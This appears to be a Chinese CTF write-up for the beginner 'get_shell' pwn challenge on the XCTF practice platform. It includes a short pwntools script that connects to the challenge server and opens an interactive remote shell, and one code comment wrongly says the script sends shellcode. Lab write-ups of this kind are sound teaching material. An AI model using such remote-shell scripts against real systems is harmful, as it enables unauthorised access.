PWN-攻防世界 get_shell

get_shell

难度系数: 6.0
题目描述:运行就能拿到shell呢,真的
题目场景:
220.249.52.133:57808
题目附件:
链接:https://pan.baidu.com/s/13OAHCWRew06-jZINlvVUtA
提取码:eodj

鉴于这个难度的题,就直接拉入64位IDA了(如果是32位则会报错)
PWN-攻防世界 get_shell

F5反汇编一下
PWN-攻防世界 get_shell

够直接....
再一结合他的题目描述,可以的,没骗人

开始编写EXP啦

from pwn import *   #导入 pwntools 中 pwn 包的所有内容
r = remote("220.249.52.133","57808")  # 链接服务器远程交互
r.sendline()  # 将shellcode 发送到远程连接
r.interactive()  # 将控制权交给用户,这样就可以使用打开的shell了

运行,结束
PWN-攻防世界 get_shell
flag乖乖出来啦~
flag就不打码了,没有什么必要

PWN-攻防世界 get_shell

上一篇:4.比较版本号-字符串比较


下一篇:Linux查看用户密码修改时间